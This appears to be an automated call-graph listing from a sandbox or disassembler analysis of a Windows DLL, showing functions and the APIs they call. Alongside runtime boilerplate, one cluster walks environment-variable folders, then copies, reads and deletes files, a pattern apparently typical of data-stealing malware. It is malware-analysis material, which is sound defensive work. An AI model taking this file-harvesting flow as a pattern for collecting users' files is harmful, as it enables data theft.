6751->6754 6752->6753 6753->6750 6753->6751 6770 23dc5f19 6754->6770 6756->6747 6758 23dc8939 6758->6750 6762 23dc5f19 11 API calls 6758->6762 6759 23dc8971 6760 23dc56d0 21 API calls 6759->6760 6764 23dc8992 6759->6764 6760->6764 6761 23dc8a07 6763 23dc8801 __freea 20 API calls 6761->6763 6762->6750 6763->6750 6764->6761 6765 23dc5f19 11 API calls 6764->6765 6766 23dc89e6 6765->6766 6766->6761 6767 23dc89f5 WideCharToMultiByte 6766->6767 6767->6761 6768 23dc8a35 6767->6768 6769 23dc8801 __freea 20 API calls 6768->6769 6769->6750 6771 23dc5c45 _abort 5 API calls 6770->6771 6772 23dc5f40 6771->6772 6773 23dc5f49 6772->6773 6778 23dc5fa1 6772->6778 6776 23dc2ada _ValidateLocalCookies 5 API calls 6773->6776 6777 23dc5f9b 6776->6777 6777->6750 6777->6758 6777->6759 6779 23dc5c45 _abort 5 API calls 6778->6779 6780 23dc5fc8 6779->6780 6781 23dc2ada _ValidateLocalCookies 5 API calls 6780->6781 6782 23dc5f89 LCMapStringW 6781->6782 6782->6773 6784 23dc6892 ___scrt_is_nonwritable_in_current_image 6783->6784 6791 23dc5671 RtlEnterCriticalSection 6784->6791 6786 23dc689c 6792 23dc68f1 6786->6792 6790 23dc68b5 _abort 6790->6408 6791->6786 6804 23dc7011 6792->6804 6794 23dc693f 6795 23dc7011 26 API calls 6794->6795 6796 23dc695b 6795->6796 6797 23dc7011 26 API calls 6796->6797 6798 23dc6979 6797->6798 6799 23dc571e _free 20 API calls 6798->6799 6800 23dc68a9 6798->6800 6799->6800 6801 23dc68bd 6800->6801 6818 23dc56b9 RtlLeaveCriticalSection 6801->6818 6803 23dc68c7 6803->6790 6805 23dc7022 6804->6805 6813 23dc701e 6804->6813 6806 23dc7029 6805->6806 6810 23dc703c ___scrt_fastfail 6805->6810 6807 23dc6368 __dosmaperr 20 API calls 6806->6807 6808 23dc702e 6807->6808 6809 23dc62ac _abort 26 API calls 6808->6809 6809->6813 6811 23dc706a 6810->6811 6812 23dc7073 6810->6812 6810->6813 6814 23dc6368 __dosmaperr 20 API calls 6811->6814 6812->6813 6815 23dc6368 __dosmaperr 20 API calls 6812->6815 6813->6794 6816 23dc706f 6814->6816 6815->6816 6817 23dc62ac _abort 26 API calls 6816->6817 6817->6813 6818->6803 6822 23dc7092 6819->6822 6823 23dc54a7 __fassign 38 API calls 6822->6823 6824 23dc70a6 6823->6824 6824->6302 7998 23dc2418 7999 23dc2420 ___scrt_release_startup_lock 7998->7999 8002 23dc47f5 7999->8002 8001 23dc2448 8003 23dc4808 8002->8003 8004 23dc4804 8002->8004 8007 23dc4815 8003->8007 8004->8001 8008 23dc5b7a _abort 20 API calls 8007->8008 8011 23dc482c 8008->8011 8009 23dc2ada _ValidateLocalCookies 5 API calls 8010 23dc4811 8009->8010 8010->8001 8011->8009 7832 23dc4a9a 7835 23dc5411 7832->7835 7836 23dc541d _abort 7835->7836 7837 23dc5af6 _abort 38 API calls 7836->7837 7840 23dc5422 7837->7840 7838 23dc55a8 _abort 38 API calls 7839 23dc544c 7838->7839 7840->7838 6012 23dc1c5b 6013 23dc1c6b ___scrt_fastfail 6012->6013 6016 23dc12ee 6013->6016 6015 23dc1c87 6017 23dc1324 ___scrt_fastfail 6016->6017 6018 23dc13b7 GetEnvironmentVariableW 6017->6018 6042 23dc10f1 6018->6042 6021 23dc10f1 57 API calls 6022 23dc1465 6021->6022 6023 23dc10f1 57 API calls 6022->6023 6024 23dc1479 6023->6024 6025 23dc10f1 57 API calls 6024->6025 6026 23dc148d 6025->6026 6027 23dc10f1 57 API calls 6026->6027 6028 23dc14a1 6027->6028 6029 23dc10f1 57 API calls 6028->6029 6030 23dc14b5 lstrlenW 6029->6030 6031 23dc14d9 lstrlenW 6030->6031 6041 23dc14d2 6030->6041 6032 23dc10f1 57 API calls 6031->6032 6033 23dc1501 lstrlenW lstrcatW 6032->6033 6034 23dc10f1 57 API calls 6033->6034 6035 23dc1539 lstrlenW lstrcatW 6034->6035 6036 23dc10f1 57 API calls 6035->6036 6037 23dc156b lstrlenW lstrcatW 6036->6037 6038 23dc10f1 57 API calls 6037->6038 6039 23dc159d lstrlenW lstrcatW 6038->6039 6040 23dc10f1 57 API calls 6039->6040 6040->6041 6041->6015 6043 23dc1118 ___scrt_fastfail 6042->6043 6044 23dc1129 lstrlenW 6043->6044 6055 23dc2c40 6044->6055 6047 23dc1168 lstrlenW 6048 23dc1177 lstrlenW FindFirstFileW 6047->6048 6049 23dc11a0 6048->6049 6050 23dc11e1 6048->6050 6051 23dc11aa 6049->6051 6052 23dc11c7 FindNextFileW 6049->6052 6050->6021 6051->6052 6057 23dc1000 6051->6057 6052->6049 6053 23dc11da FindClose 6052->6053 6053->6050 6056 23dc1148 lstrcatW lstrlenW 6055->6056 6056->6047 6056->6048 6058 23dc1022 ___scrt_fastfail 6057->6058 6059 23dc10af 6058->6059 6060 23dc102f lstrcatW lstrlenW 6058->6060 6061 23dc10b5 lstrlenW 6059->6061 6073 23dc10ad 6059->6073 6062 23dc105a lstrlenW 6060->6062 6063 23dc106b lstrlenW 6060->6063 6088 23dc1e16 6061->6088 6062->6063 6074 23dc1e89 lstrlenW 6063->6074 6066 23dc10ca 6069 23dc1e89 5 API calls 6066->6069 6066->6073 6067 23dc1088 GetFileAttributesW 6068 23dc109c 6067->6068 6067->6073 6068->6073 6080 23dc173a 6068->6080 6070 23dc10df 6069->6070 6093 23dc11ea 6070->6093 6073->6051 6075 23dc2c40 ___scrt_fastfail 6074->6075 6076 23dc1ea7 lstrcatW lstrlenW 6075->6076 6077 23dc1ed1 lstrcatW 6076->6077 6078 23dc1ec2 6076->6078 6077->6067 6078->6077 6079 23dc1ec7 lstrlenW 6078->6079 6079->6077 6081 23dc1747 ___scrt_fastfail 6080->6081 6108 23dc1cca 6081->6108 6084 23dc199f 6084->6073 6086 23dc1824 ___scrt_fastfail _strlen 6086->6084 6128 23dc15da 6086->6128 6089 23dc1e29 6088->6089 6092 23dc1e4c 6088->6092 6090 23dc1e2d lstrlenW 6089->6090 6089->6092 6091 23dc1e3f lstrlenW 6090->6091 6090->6092 6091->6092 6092->6066 6094 23dc120e ___scrt_fastfail 6093->6094 6095 23dc1e89 5 API calls 6094->6095 6096 23dc1220 GetFileAttributesW 6095->6096 6097 23dc1235 6096->6097 6098 23dc1246 6096->6098 6097->6098 6101 23dc173a 35 API calls 6097->6101 6099 23dc1e89 5 API calls 6098->6099 6100 23dc1258 6099->6100 6102 23dc10f1 56 API calls 6100->6102 6101->6098 6103 23dc126d 6102->6103 6104 23dc1e89 5 API calls 6103->6104 6105 23dc127f ___scrt_fastfail 6104->6105 6106 23dc10f1 56 API calls 6105->6106 6107 23dc12e6 6106->6107 6107->6073 6109 23dc1cf1 ___scrt_fastfail 6108->6109 6110 23dc1d0f CopyFileW CreateFileW 6109->6110 6111 23dc1d44 DeleteFileW 6110->6111 6112 23dc1d55 GetFileSize 6110->6112 6117 23dc1808 6111->6117 6113 23dc1ede 22 API calls 6112->6113 6114 23dc1d66 ReadFile 6113->6114 6115 23dc1d7d CloseHandle DeleteFileW 6114->6115 6116 23dc1d94 CloseHandle DeleteFileW 6114->6116 6115->6117 6116->6117 6117->6084 6118 23dc1ede 6117->6118 6120 23dc222f 6118->6120 6121 23dc224e 6120->6121 6124 23dc2250 6120->6124 6136 23dc474f 6120->6136 6141 23dc47e5 6120->6141 6121->6086 6123 23dc2908 6125 23dc35d2 __CxxThrowException@8 RaiseException 6123->6125 6124->6123 6148 23dc35d2 6124->6148 6127 23dc2925 6125->6127 6127->6086 6129 23dc160c _strlen 6128->6129 6130 23dc163c lstrlenW 6129->6130 6236 23dc1c9d 6130->6236 6132 23dc1655 lstrcatW lstrlenW 6133 23dc1678 6132->6133 6134 23dc167e lstrcatW 6133->6134 6135 23dc1693 ___scrt_fastfail 6133->6135 6134->6135 6135->6086 6151 23dc4793 6136->6151 6139 23dc478f 6139->6120 6140 23dc4765 6157 23dc2ada 6140->6157 6143 23dc56d0 _abort 6141->6143 6142 23dc570e 6170 23dc6368 6142->6170 6143->6142 6144 23dc56f9 RtlAllocateHeap 6143->6144 6147 23dc474f _abort 7 API calls 6143->6147 6144->6143 6146 23dc570c 6144->6146 6146->6120 6147->6143 6149 23dc35f2 RaiseException 6148->6149 6149->6123 6152 23dc479f ___scrt_is_nonwritable_in_current_image 6151->6152 6164 23dc5671 RtlEnterCriticalSection 6152->6164 6154 23dc47aa 6165 23dc47dc 6154->6165 6156 23dc47d1 _abort 6156->6140 6158 23dc2ae5 IsProcessorFeaturePresent 6157->6158 6159 23dc2ae3 6157->6159 6161 23dc2b58 6158->6161 6159->6139 6169 23dc2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6161->6169 6163 23dc2c3b 6163->6139 6164->6154 6168 23dc56b9 RtlLeaveCriticalSection 6165->6168 6167 23dc47e3 6167->6156 6168->6167 6169->6163 6173 23dc5b7a GetLastError 6170->6173 6174 23dc5b99 6173->6174 6175 23dc5b93 6173->6175 6179 23dc5bf0 SetLastError 6174->6179 6199 23dc637b 6174->6199 6192 23dc5e08 6175->6192 6181 23dc5bf9 6179->6181 6180 23dc5bb3 6206 23dc571e 6180->6206 6181->6146 6185 23dc5bcf 6219 23dc593c 6185->6219 6186 23dc5bb9 6188 23dc5be7 SetLastError 6186->6188 6188->6181 6190 23dc571e _free 17 API calls 6191 23dc5be0 6190->6191 6191->6179 6191->6188 6224 23dc5c45 6192->6224 6194 23dc5e2f 6195 23dc5e47 TlsGetValue 6194->6195 6196 23dc5e3b 6194->6196 6195->6196 6197 23dc2ada _ValidateLocalCookies 5 API calls 6196->6197 6198 23dc5e58 6197->6198 6198->6174 6204 23dc6388 _abort 6199->6204 6200 23dc63c8 6203 23dc6368 __dosmaperr 19 API calls 6200->6203 6201 23dc63b3 RtlAllocateHeap 6202 23dc5bab 6201->6202 6201->6204 6202->6180 6212 23dc5e5e 6202->6212 6203->6202 6204->6200 6204->6201 6205 23dc474f _abort 7 API calls 6204->6205 6205->6204 6207 23dc5729 HeapFree 6206->6207 6211 23dc5752 __dosmaperr 6206->6211 6208 23dc573e 6207->6208 6207->6211 6209 23dc6368 __dosmaperr 18 API calls 6208->6209 6210 23dc5744 GetLastError 6209->6210 6210->6211 6211->6186 6213 23dc5c45 _abort 5 API calls 6212->6213 6214 23dc5e85 6213->6214 6215 23dc5ea0 TlsSetValue 6214->6215 6216 23dc5e94 6214->6216 6215->6216 6217 23dc2ada _ValidateLocalCookies 5 API calls 6216->6217 6218 23dc5bc8 6217->6218 6218->6180 6218->6185 6230 23dc5914 6219->6230 6227 23dc5c71 6224->6227 6229 23dc5c75 __crt_fast_encode_pointer 6224->6229 6225 23dc5c95 6228 23dc5ca1 GetProcAddress 6225->6228 6225->6229 6226 23dc5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6226->6227 6227->6225 6227->6226 6227->6229 6228->6229 6229->6194 6231 23dc5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6230->6231 6232 23dc5938 6231->6232 6233 23dc58c4 6232->6233 6234 23dc5758 _abort 20 API calls 6233->6234 6235 23dc58e8 6234->6235 6235->6190 6237 23dc1ca6 _strlen 6236->6237 6237->6132 7632 23dc20db 7633 23dc20e7 ___scrt_is_nonwritable_in_current_image 7632->7633 7634 23dc2110 dllmain_raw 7633->7634 7639 23dc210b 7633->7639 7644 23dc20f6 7633->7644 7635 23dc212a 7634->7635 7634->7644 7645 23dc1eec 7635->7645 7637 23dc2177 7638 23dc1eec 31 API calls 7637->7638 7637->7644 7640 23dc218a 7638->7640 7639->7637 7641 23dc1eec 31 API calls 7639->7641 7639->7644 7642 23dc2193 dllmain_raw 7640->7642 7640->7644 7643 23dc216d dllmain_raw 7641->7643 7642->7644 7643->7637 7646 23dc1f2a dllmain_crt_process_detach 7645->7646 7647 23dc1ef7 7645->7647 7654 23dc1f06 7646->7654 7648 23dc1f1c dllmain_crt_process_attach 7647->7648 7649 23dc1efc 7647->7649 7648->7654 7650 23dc1f01 7649->7650 7651 23dc1f12 7649->7651 7650->7654 7655 23dc240b 7650->7655 7660 23dc23ec 7651->7660 7654->7639 7668 23dc53e5 7655->7668 7761 23dc3513 7660->7761 7663 23dc23f5 7663->7654 7666 23dc2408 7666->7654 7667 23dc351e 7 API calls 7667->7663 7674 23dc5aca 7668->7674 7671 23dc351e 7750 23dc3820 7671->7750 7673 23dc2415 7673->7654 7675 23dc5ad4 7674->7675 7676 23dc2410 7674->7676 7677 23dc5e08 _abort 11 API calls 7675->7677 7676->7671 7678 23dc5adb 7677->7678 7678->7676 7679 23dc5e5e _abort 11 API calls 7678->7679 7680 23dc5aee 7679->7680 7682 23dc59b5 7680->7682 7683 23dc59c0 7682->7683 7684 23dc59d0 7682->7684 7688 23dc59d6 7683->7688 7684->7676 7687 23dc571e _free 20 API calls 7687->7684 7689 23dc59e9 7688->7689 7690 23dc59ef 7688->7690 7692 23dc571e _free 20 API calls 7689->7692 7691 23dc571e _free 20 API calls 7690->7691 7693 23dc59fb 7691->7693 7692->7690 7694 23dc571e _free 20 API calls 7693->7694 7695 23dc5a06 7694->7695 7696 23dc571e _free 20 API calls 7695->7696 7697 23dc5a11 7696->7697 7698 23dc571e _free 20 API calls 7697->7698 7699 23dc5a1c 7698->7699 7700 23dc571e _free 20 API calls 7699->7700 7701 23dc5a27 7700->7701 7702 23dc571e _free 20 API calls 7701->7702 7703 23dc5a32 7702->7703 7704 23dc571e _free 20 API calls 7703->7704 7705 23dc5a3d 7704->7705 7706 23dc571e _free 20 API calls 7705->7706 7707 23dc5a48 7706->7707 7708 23dc571e _free 20 API calls 7707->7708 7709 23dc5a56 7708->7709 7714 23dc589c 7709->7714 7720 23dc57a8 7714->7720 7716 23dc58c0 7717 23dc58ec 7716->7717 7733 23dc5809 7717->7733 7719 23dc5910 7719->7687 7721 23dc57b4 ___scrt_is_nonwritable_in_current_image 7720->7721 7728 23dc5671 RtlEnterCriticalSection 7721->7728 7723 23dc57e8 7729 23dc57fd 7723->7729 7725 23dc57be 7725->7723 7727 23dc571e _free 20 API calls 7725->7727 7726 23dc57f5 _abort 7726->7716 7727->7723 7728->7725 7732 23dc56b9 RtlLeaveCriticalSection 7729->7732 7731 23dc5807 7731->7726 7732->7731 7734 23dc5815 ___scrt_is_nonwritable_in_current_image 7733->7734 7741 23dc5671 RtlEnterCriticalSection 7734->7741 7736 23dc581f 7742 23dc5a7f 7736->7742 7738 23dc5832 7746 23dc5848 7738->7746 7740 23dc5840 _abort 7740->7719 7741->7736 7743 23dc5ab5 __fassign 7742->7743 7744 23dc5a8e __fassign 7742->7744 7743->7738 7744->7743 7745 23dc7cc2 __fassign 20 API calls 7744->7745 7745->7743 7749 23dc56b9 RtlLeaveCriticalSection 7746->7749 7748 23dc5852 7748->7740 7749->7748 7751 23dc382d 7750->7751 7752 23dc384b ___vcrt_freefls@4 7750->7752 7753 23dc383b 7751->7753 7756 23dc3b67 7751->7756 7752->7673 7755 23dc3ba2 ___vcrt_FlsSetValue 6 API calls 7753->7755 7755->7752 7757 23dc3a82 try_get_function 5 API calls 7756->7757 7758 23dc3b81 7757->7758 7759 23dc3b99 TlsGetValue 7758->7759 7760 23dc3b8d 7758->7760 7759->7760 7760->7753 7767 23dc3856 7761->7767 7763 23dc23f1 7763->7663 7764 23dc53da 7763->7764 7765 23dc5b7a _abort 20 API calls 7764->7765 7766 23dc23fd 7765->7766 7766->7666 7766->7667 7768 23dc385f 7767->7768 7769 23dc3862 GetLastError 7767->7769 7768->7763 7770 23dc3b67 ___vcrt_FlsGetValue 6 API calls 7769->7770 7771 23dc3877 7770->7771 7772 23dc38dc SetLastError 7771->7772 7773 23dc3ba2 ___vcrt_FlsSetValue 6 API calls 7771->7773 7778 23dc3896 7771->7778 7772->7763 7774 23dc3890 7773->7774 7775 23dc38b8 7774->7775 7776 23dc3ba2 ___vcrt_FlsSetValue 6 API calls 7774->7776 7774->7778 7777 23dc3ba2 ___vcrt_FlsSetValue 6 API calls 7775->7777 7775->7778 7776->7775 7777->7778 7778->7772 6825 23dc73d5 6826 23dc73e1 ___scrt_is_nonwritable_in_current_image 6825->6826 6837 23dc5671 RtlEnterCriticalSection 6826->6837 6828 23dc73e8 6838 23dc8be3 6828->6838 6830 23dc73f7 6831 23dc7406 6830->6831 6851 23dc7269 GetStartupInfoW 6830->6851 6862 23dc7422 6831->6862 6835 23dc7417 _abort 6837->6828 6839 23dc8bef ___scrt_is_nonwritable_in_current_image 6838->6839 6840 23dc8bfc 6839->6840 6841 23dc8c13 6839->6841 6843 23dc6368 __dosmaperr 20 API calls 6840->6843 6865 23dc5671 RtlEnterCriticalSection 6841->6865 6844 23dc8c01 6843->6844 6845 23dc62ac _abort 26 API calls 6844->6845 6846 23dc8c0b _abort 6845->6846 6846->6830 6847 23dc8c4b 6873 23dc8c72 6847->6873 6848 23dc8c1f 6848->6847 6866 23dc8b34 6848->6866 6852 23dc7318 6851->6852 6853 23dc7286 6851->6853 6857 23dc731f 6852->6857 6853->6852 6854 23dc8be3 27 API calls 6853->6854 6855 23dc72af 6854->6855 6855->6852 6856 23dc72dd GetFileType 6855->6856 6856->6855 6858 23dc7326 6857->6858 6859 23dc7369 GetStdHandle 6858->6859 6860 23dc73d1 6858->6860 6861 23dc737c GetFileType 6858->6861 6859->6858 6860->6831 6861->6858 6884 23dc56b9 RtlLeaveCriticalSection 6862->6884 6864 23dc7429 6864->6835 6865->6848 6867 23dc637b _abort 20 API calls 6866->6867 6868 23dc8b46 6867->6868 6872 23dc8b53 6868->6872 6876 23dc5eb7 6868->6876 6869 23dc571e _free 20 API calls 6870 23dc8ba5 6869->6870 6870->6848 6872->6869 6883 23dc56b9 RtlLeaveCriticalSection 6873->6883 6875 23dc8c79 6875->6846 6877 23dc5c45 _abort 5 API calls 6876->6877 6878 23dc5ede 6877->6878 6879 23dc5efc InitializeCriticalSectionAndSpinCount 6878->6879 6880 23dc5ee7 6878->6880 6879->6880 6881 23dc2ada _ValidateLocalCookies 5 API calls 6880->6881 6882 23dc5f13 6881->6882 6882->6868 6883->6875 6884->6864 7779 23dc4ed7 7780 23dc6d60 51 API calls 7779->7780 7781 23dc4ee9 7780->7781 7790 23dc7153 GetEnvironmentStringsW 7781->7790 7785 23dc571e _free 20 API calls 7787 23dc4f29 7785->7787 7786 23dc4eff 7788 23dc571e _free 20 API calls 7786->7788 7789 23dc4ef4 7788->7789 7789->7785 7791 23dc716a 7790->7791 7801 23dc71bd 7790->7801 7794 23dc7170 WideCharToMultiByte 7791->7794 7792 23dc4eee 7792->7789 7802 23dc4f2f 7792->7802 7793 23dc71c6 FreeEnvironmentStringsW 7793->7792 7795 23dc718c 7794->7795 7794->7801 7796 23dc56d0 21 API calls 7795->7796 7797 23dc7192 7796->7797 7798 23dc7199 WideCharToMultiByte 7797->7798 7799 23dc71af 7797->7799 7798->7799 7800 23dc571e _free 20 API calls 7799->7800 7800->7801 7801->7792 7801->7793 7803 23dc4f44 7802->7803 7804 23dc637b _abort 20 API calls 7803->7804 7805 23dc4f6b 7804->7805 7807 23dc4fcf 7805->7807 7809 23dc637b _abort 20 API calls 7805->7809 7810 23dc4fd1 7805->7810 7814 23dc4ff3 7805->7814 7817 23dc571e _free 20 API calls 7805->7817 7819 23dc544d 7805->7819 7806 23dc571e _free 20 API calls 7808 23dc4fe9 7806->7808 7807->7806 7808->7786 7809->7805 7812 23dc5000 20 API calls 7810->7812 7813 23dc4fd7 7812->7813 7815 23dc571e _free 20 API calls 7813->7815 7816 23dc62bc _abort 11 API calls 7814->7816 7815->7807 7818 23dc4fff 7816->7818 7817->7805 7820 23dc545a 7819->7820 7821 23dc5468 7819->7821 7820->7821 7826 23dc547f 7820->7826 7822 23dc6368 __dosmaperr 20 API calls 7821->7822 7823 23dc5470 7822->7823 7824 23dc62ac _abort 26 API calls 7823->7824 7825 23dc547a 7824->7825 7825->7805 7826->7825 7827 23dc6368 __dosmaperr 20 API calls 7826->7827 7827->7823 7828 23dc36d0 7829 23dc36e2 7828->7829 7831 23dc36f0 @_EH4_CallFilterFunc@8 7828->7831 7830 23dc2ada _ValidateLocalCookies 5 API calls 7829->7830 7830->7831 7841 23dc3c90 RtlUnwind 7051 23dc5351 7052 23dc5374 7051->7052 7053 23dc5360 7051->7053 7054 23dc571e _free 20 API calls 7052->7054 7053->7052 7055 23dc571e _free 20 API calls 7053->7055 7056 23dc5386 7054->7056 7055->7052 7057 23dc571e _free 20 API calls 7056->7057 7058 23dc5399 7057->7058 7059 23dc571e _free 20 API calls 7058->7059 7060 23dc53aa 7059->7060 7061 23dc571e _free 20 API calls 7060->7061 7062 23dc53bb 7061->7062 8012 23dc220c 8013 23dc221a dllmain_dispatch 8012->8013 8014 23dc2215 8012->8014 8016 23dc22b1 8014->8016 8017 23dc22c7 8016->8017 8019 23dc22d0 8017->8019 8020 23dc2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8017->8020 8019->8013 8020->8019 7872 23dc724e GetProcessHeap 7873 23dc284f 7876 23dc2882 7873->7876 7879 23dc3550 7876->7879 7878 23dc285d 7880 23dc355d 7879->7880 7883 23dc358a 7879->7883 7881 23dc47e5 ___std_exception_copy 21 API calls 7880->7881 7880->7883 7882 23dc357a 7881->7882 7882->7883 7884 23dc544d ___std_exception_copy 26 API calls 7882->7884 7883->7878 7884->7883 7063 23dc5348 7066 23dc3529 7063->7066 7067 23dc3543 7066->7067 7068 23dc3532 7066->7068 7074 23dc391b 7068->7074 7075 23dc3925 7074->7075 7076 23dc3537 7074->7076 7086 23dc3b2c 7075->7086 7078 23dc3972 7076->7078 7079 23dc353c 7078->7079 7080 23dc397d 7078->7080 7082 23dc3c50 7079->7082 7081 23dc3987 RtlDeleteCriticalSection 7080->7081 7081->7079 7081->7081 7083 23dc3c7f 7082->7083 7085 23dc3c59 7082->7085 7083->7067 7084 23dc3c69 FreeLibrary 7084->7085 7085->7083 7085->7084 7091 23dc3a82 7086->7091 7088 23dc3b46 7089 23dc3b5e TlsFree 7088->7089 7090 23dc3b52 7088->7090 7089->7090 7090->7076 7092 23dc3aaa 7091->7092 7096 23dc3aa6 __crt_fast_encode_pointer 7091->7096 7092->7096 7097 23dc39be 7092->7097 7095 23dc3ac4 GetProcAddress 7095->7096 7096->7088 7102 23dc39cd try_get_first_available_module 7097->7102 7098 23dc3a77 7098->7095 7098->7096 7099 23dc39ea LoadLibraryExW 7100 23dc3a05 GetLastError 7099->7100 7099->7102 7100->7102 7101 23dc3a60 FreeLibrary 7101->7102 7102->7098 7102->7099 7102->7101 7103 23dc3a38 LoadLibraryExW 7102->7103 7103->7102 7104 23dc7b48 7114 23dc8ebf 7104->7114 7108 23dc7b55 7127 23dc907c 7108->7127 7111 23dc7b7f 7112 23dc571e _free 20 API calls 7111->7112 7113 23dc7b8a 7112->7113 7131 23dc8ec8 7114->7131 7116 23dc7b50 7117 23dc8fdc 7116->7117 7118 23dc8fe8 ___scrt_is_nonwritable_in_current_image 7117->7118 7151 23dc5671 RtlEnterCriticalSection 7118->7151 7120 23dc905e 7165 23dc9073 7120->7165 7122 23dc8ff3 7122->7120 7124 23dc9032 RtlDeleteCriticalSection 7122->7124 7152 23dca09c 7122->7152 7123 23dc906a _abort 7123->7108 7126 23dc571e _free 20 API calls 7124->7126 7126->7122 7128 23dc7b64 RtlDeleteCriticalSection 7127->7128 7129 23dc9092 7127->7129 7128->7108 7128->7111 7129->7128 7130 23dc571e _free 20 API calls 7129->7130 7130->7128 7132 23dc8ed4 ___scrt_is_nonwritable_in_current_image 7131->7132 7141 23dc5671 RtlEnterCriticalSection 7132->7141 7134 23dc8f77 7146 23dc8f97 7134->7146 7137 23dc8f83 _abort 7137->7116 7139 23dc8e78 66 API calls 7140 23dc8ee3 7139->7140 7140->7134 7140->7139 7142 23dc7b94 RtlEnterCriticalSection 7140->7142 7143 23dc8f6d 7140->7143 7141->7140 7142->7140 7149 23dc7ba8 RtlLeaveCriticalSection 7143->7149 7145 23dc8f75 7145->7140 7150 23dc56b9 RtlLeaveCriticalSection 7146->7150 7148 23dc8f9e 7148->7137 7149->7145 7150->7148 7151->7122 7153 23dca0a8 ___scrt_is_nonwritable_in_current_image 7152->7153 7154 23dca0ce 7153->7154 7155 23dca0b9 7153->7155 7164 23dca0c9 _abort 7154->7164 7168 23dc7b94 RtlEnterCriticalSection 7154->7168 7156 23dc6368 __dosmaperr 20 API calls 7155->7156 7157 23dca0be 7156->7157 7159 23dc62ac _abort 26 API calls 7157->7159 7159->7164 7160 23dca0ea 7169 23dca026 7160->7169 7162 23dca0f5 7185 23dca112 7162->7185 7164->7122 7433 23dc56b9 RtlLeaveCriticalSection 7165->7433 7167 23dc907a 7167->7123 7168->7160 7170 23dca048 7169->7170 7171 23dca033 7169->7171 7183 23dca043 7170->7183 7188 23dc8e12 7170->7188 7172 23dc6368 __dosmaperr 20 API calls 7171->7172 7173 23dca038 7172->7173 7175 23dc62ac _abort 26 API calls 7173->7175 7175->7183 7177 23dc907c 20 API calls 7178 23dca064 7177->7178 7194 23dc7a5a 7178->7194 7180 23dca06a 7201 23dcadce 7180->7201 7183->7162 7184 23dc571e _free 20 API calls 7184->7183 7432 23dc7ba8 RtlLeaveCriticalSection 7185->7432 7187 23dca11a 7187->7164 7189 23dc8e2a 7188->7189 7193 23dc8e26 7188->7193 7190 23dc7a5a 26 API calls 7189->7190 7189->7193 7191 23dc8e4a 7190->7191 7216 23dc9a22 7191->7216 7193->7177 7195 23dc7a7b 7194->7195 7196 23dc7a66 7194->7196 7195->7180 7197 23dc6368 __dosmaperr 20 API calls 7196->7197 7198 23dc7a6b 7197->7198 7199 23dc62ac _abort 26 API calls 7198->7199 7200 23dc7a76 7199->7200 7200->7180 7202 23dcaddd 7201->7202 7203 23dcadf2 7201->7203 7204 23dc6355 __dosmaperr 20 API calls 7202->7204 7205 23dcae2d 7203->7205 7210 23dcae19 7203->7210 7206 23dcade2 7204->7206 7207 23dc6355 __dosmaperr 20 API calls 7205->7207 7209 23dc6368 __dosmaperr 20 API calls 7206->7209 7208 23dcae32 7207->7208 7211 23dc6368 __dosmaperr 20 API calls 7208->7211 7214 23dca070 7209->7214 7389 23dcada6 7210->7389 7213 23dcae3a 7211->7213 7215 23dc62ac _abort 26 API calls 7213->7215 7214->7183 7214->7184 7215->7214 7217 23dc9a2e ___scrt_is_nonwritable_in_current_image 7216->7217 7218 23dc9a4e 7217->7218 7219 23dc9a36 7217->7219 7221 23dc9aec 7218->7221 7226 23dc9a83 7218->7226 7241 23dc6355 7219->7241 7223 23dc6355 __dosmaperr 20 API calls 7221->7223 7225 23dc9af1 7223->7225 7224 23dc6368 __dosmaperr 20 API calls 7237 23dc9a43 _abort 7224->7237 7227 23dc6368 __dosmaperr 20 API calls 7225->7227 7244 23dc8c7b RtlEnterCriticalSection 7226->7244 7229 23dc9af9 7227->7229 7231 23dc62ac _abort 26 API calls 7229->7231 7230 23dc9a89 7232 23dc9aba 7230->7232 7233 23dc9aa5 7230->7233 7231->7237 7245 23dc9b0d 7232->7245 7234 23dc6368 __dosmaperr 20 API calls 7233->7234 7236 23dc9aaa 7234->7236 7239 23dc6355 __dosmaperr 20 API calls 7236->7239 7237->7193 7238 23dc9ab5 7296 23dc9ae4 7238->7296 7239->7238 7242 23dc5b7a _abort 20 API calls 7241->7242 7243 23dc635a 7242->7243 7243->7224 7244->7230 7246 23dc9b3b 7245->7246 7282 23dc9b34 7245->7282 7247 23dc9b5e 7246->7247 7248 23dc9b3f 7246->7248 7252 23dc9baf 7247->7252 7253 23dc9b92 7247->7253 7250 23dc6355 __dosmaperr 20 API calls 7248->7250 7249 23dc2ada _ValidateLocalCookies 5 API calls 7254 23dc9d15 7249->7254 7251 23dc9b44 7250->7251 7255 23dc6368 __dosmaperr 20 API calls 7251->7255 7256 23dc9bc5 7252->7256 7299 23dca00b 7252->7299 7257 23dc6355 __dosmaperr 20 API calls 7253->7257 7254->7238 7258 23dc9b4b 7255->7258 7302 23dc96b2 7256->7302 7261 23dc9b97 7257->7261 7262 23dc62ac _abort 26 API calls 7258->7262 7264 23dc6368 __dosmaperr 20 API calls 7261->7264 7262->7282 7267 23dc9b9f 7264->7267 7265 23dc9c0c 7268 23dc9c66 WriteFile 7265->7268 7269 23dc9c20 7265->7269 7266 23dc9bd3 7270 23dc9bf9 7266->7270 7271 23dc9bd7 7266->7271 7272 23dc62ac _abort 26 API calls 7267->7272 7275 23dc9c89 GetLastError 7268->7275 7284 23dc9bef 7268->7284 7273 23dc9c28 7269->7273 7274 23dc9c56 7269->7274 7314 23dc9492 GetConsoleCP 7270->7314 7286 23dc9ccd 7271->7286 7309 23dc9645 7271->7309 7272->7282 7277 23dc9c2d 7273->7277 7278 23dc9c46 7273->7278 7340 23dc9728 7274->7340 7275->7284 7277->7286 7325 23dc9807 7277->7325 7332 23dc98f5 7278->7332 7281 23dc6368 __dosmaperr 20 API calls 7285 23dc9cf2 7281->7285 7282->7249 7284->7282 7284->7286 7287 23dc9ca9 7284->7287 7289 23dc6355 __dosmaperr 20 API calls 7285->7289 7286->7281 7286->7282 7290 23dc9cc4 7287->7290 7291 23dc9cb0 7287->7291 7289->7282 7347 23dc6332 7290->7347 7292 23dc6368 __dosmaperr 20 API calls 7291->7292 7294 23dc9cb5 7292->7294 7295 23dc6355 __dosmaperr 20 API calls 7294->7295 7295->7282 7388 23dc8c9e RtlLeaveCriticalSection 7296->7388 7298 23dc9aea 7298->7237 7352 23dc9f8d 7299->7352 7374 23dc8dbc 7302->7374 